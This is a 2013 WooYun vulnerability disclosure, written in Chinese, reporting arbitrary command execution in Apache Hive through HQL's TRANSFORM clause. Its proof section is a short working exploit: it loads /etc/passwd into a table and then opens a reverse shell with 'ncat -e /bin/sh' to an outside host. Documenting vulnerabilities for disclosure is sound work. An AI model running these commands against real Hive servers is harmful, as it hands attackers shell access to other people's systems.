当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018834

漏洞标题:Hive任意命令/代码执行漏洞

相关厂商:apache

漏洞作者: kindle

提交时间:2013-02-18 09:57

修复时间:2013-02-18 09:57

公开时间:2013-02-18 09:57

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-02-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Hive是建立在 Hadoop 上的数据仓库基础构架。它提供了一系列的工具,可以用来进行数据提取转化加载(ETL),这是一种可以存储、查询和分析存储在 Hadoop 中的大规模数据的机制。Hive 定义了简单的类 SQL 查询语言,称为 QL,它允许熟悉 SQL 的用户查询数据。同时,这个语言也允许熟悉 MapReduce 开发者的开发自定义的 mapper 和 reducer 来处理内建的 mapper 和 reducer 无法完成的复杂的分析工作。

详细说明:

HQL可以通过transform自定义Hive使用的 Map/Reduce 脚本,从而调用shell/python等语言,导致攻击者可以通过hive接口等相关操作方式直接获取服务器权限

漏洞证明:

创建测试表
create table if not exists kindle(exploit string);
导入/etc/passwd文件到kindle表数据(这步很关键,没数据无法触发漏洞)
load data local inpath '/etc/passwd' INTO TABLE kindle;
通过transform来自定义hive使用的shell命令,反弹shell
select transform(exploit) USING '/usr/bin/ncat -e /bin/sh ip port' from kindle;
删除测试表
drop table kindle;

修复方案:

block transform

版权声明:转载请注明来源 kindle@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝